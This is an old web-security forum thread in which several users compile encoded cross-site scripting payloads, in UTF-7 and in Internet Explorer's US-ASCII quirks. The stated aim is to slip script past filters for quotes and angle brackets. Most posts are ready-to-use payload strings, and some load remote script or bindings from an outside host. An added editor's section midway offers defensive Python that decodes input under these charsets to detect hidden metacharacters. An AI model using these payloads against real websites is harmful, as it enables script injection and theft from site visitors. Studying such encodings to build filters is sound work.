Bypassing Filters With Encoding
Posted by: maluc
Date: November 19, 2006 12:42AM

Thanks to RSnake for opening my eyes to alternate encoding recently, with his blog .. i was hoping to concentrate the knowledge (and questions) here..

particularly sample strings to plug in for each encoding that'll get around standard filters for ',",<,> and allow script that executes.

UTF-7
can use http://maluc.sitesled.com/utf7.html for encoding (might be worth adding to the bottom of the cheat sheet)
<script>alert(1)</script> to +ADw-script+AD4-alert(1)+ADw-/script+AD4-
"><script>alert("XSS")</script> to +ACIAPgA8-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
<script src=http://ha.ckers.org/s.js?> to +ADw-script src+AD0-http://ha.ckers.org/s.js+AD8APg-
" style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')" to +ACI- style+AD0AIg--moz-binding:url('http://ha.ckers.org/xssmoz.xml+ACM-xss')+ACI-
";alert(1);// to +ACIAOw-alert(1)+ADs-//

i'll add other encodings as i understand them .-. .. using the same 5 sample injections. unless there is a better shortlist of injections to list

and while incomplete, this works in IE-only for US-ASCII:
<script>alert(1)</script> to ¼script¾alert(1)¼/script¾
"><script>alert("XSS")</script> to ¢¾¼script¾alert(¢XSS¢)¼/script¾
i know it's not new, just concentrating info .. more later - and feel free to contribute cause i'm very new to uncommon encoding methods ^^

-maluc

Re: Bypassing Filters With Encoding
Posted by: rsnake
Date: November 19, 2006 05:03PM

This is a good list. We should definitely try to keep it up to date as new things arise.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Bypassing Filters With Encoding
Posted by: maluc
Date: November 19, 2006 09:56PM

here's a very simplistic php script i uploaded for testing different encoding methods..

i realize it's XSSable - i really don't care _-_

http://maluc.110mb.com/charsettest.php?UTF-7&+ADw-script+AD4-alert(1)+ADw-/script+AD4-x
Usage:
http://maluc.110mb.com/charsettest.php?charset&string

-maluc

Re: Bypassing Filters With Encoding
Posted by: jungsonn
Date: November 20, 2006 02:09AM

Yay! nice work maluc! is this info being collected somewhere for quick reference? cause i see it scattered across the boards.

Re: Bypassing Filters With Encoding
Posted by: maluc
Date: November 20, 2006 05:16AM

yeah, it's mostly so i don't have to search everywhere for each encoding's quirks. Normally i'd throw it all into a random .txt file, but i thought others might benefit too.. it'll be a hodgepodge for now, but later i'll compile it into that first post

Continuing with US-ASCII (these are IE-only):
Alternative Quotations: ¢§ .. which are %A2,%A7 respectively.
Alternative semi-colon: » .. which is %BB
" style="xx:expression(alert('XSS'))" to ¢ style=¢xx:expression(alert(§XSS§))¢
";alert(1);// to ¢;alert(1);//
';alert(1);// to §;alert(1);//

à (%E0) is the equivalent for tildes, which don't seem to work in IE7

Edit: removed -moz-binding and changed to xx:expression, since it's IE-only

-maluc



Edited 1 time(s). Last edit at 11/29/2006 04:18AM by maluc.

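
Editor's note, added to this thread as a defensive example (Python; not code from maluc, RSnake or the forum): a canonicalization check that decodes input under the two charsets discussed above, UTF-7 and IE's handling of US-ASCII, and reports which filtered metacharacters appear only after decoding. It assumes IE's US-ASCII behaviour is "drop the high bit" (byte & 0x7F), which is the general rule behind the ¼ ¾ ¢ § » mappings given in the posts; the sample inputs are the thread's own strings.

```python
# Added example (not from the thread): canonicalize under the charsets the
# posts discuss, then look for the metacharacters a raw-byte filter would miss.
FILTERED = set('<>"\'')  # the characters the thread's filters are blocking


def decode_utf7(data: bytes) -> str:
    """Decode as UTF-7, e.g. b'+ADw-' -> '<', b'+AD4-' -> '>', b'+ACI-' -> '"'."""
    return data.decode("utf-7", errors="replace")


def decode_ie_us_ascii(data: bytes) -> str:
    """Model of old IE's US-ASCII handling (assumption: the high bit is dropped):
    0xBC -> '<', 0xBE -> '>', 0xA2 -> '"', 0xA7 -> "'", 0xBB -> ';'."""
    return bytes(b & 0x7F for b in data).decode("ascii")


DECODERS = {"utf-7": decode_utf7, "us-ascii(ie)": decode_ie_us_ascii}


def hidden_metachars(data: bytes) -> dict:
    """Map charset name -> filtered characters that show up only after decoding."""
    visible = set(data.decode("latin-1")) & FILTERED
    found = {}
    for name, decode in DECODERS.items():
        extra = (set(decode(data)) & FILTERED) - visible
        if extra:
            found[name] = "".join(sorted(extra))
    return found


def is_safe(data: bytes) -> bool:
    """True only if no filtered character is present raw or under any decoding."""
    return not (set(data.decode("latin-1")) & FILTERED) and not hidden_metachars(data)


if __name__ == "__main__":
    # Sample inputs taken from the posts above (Latin-1 bytes for the IE cases).
    samples = [
        b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
        "¼script¾alert(1)¼/script¾".encode("latin-1"),
        "¢ style=¢xx:expression(alert(§XSS§))¢".encode("latin-1"),
    ]
    for s in samples:
        print(s, "->", hidden_metachars(s), "safe:", is_safe(s))
```

The check only helps a filter that must accept arbitrary bytes; the actual fix for this class of bypass is to declare the page's charset explicitly in the Content-Type header and meta tag so the browser never guesses.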
Re: Bypassing Filters With Encoding
Posted by: maluc
Date: November 29, 2006 04:15AM

lol.. now why did i add a -moz-binding for US-ASCII, an IE-only encoding.. removed.

-maluc

Re: Bypassing Filters With Encoding
Posted by: rsnake
Date: November 29, 2006 09:23PM

Hahah... I never would have noticed unless you said something. There are really too many moving parts to web security to keep it all on the top of your head all at the same time.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Bypassing Filters With Encoding
Posted by: jungsonn
Date: November 30, 2006 05:20AM

:D

moving parts... ^-^
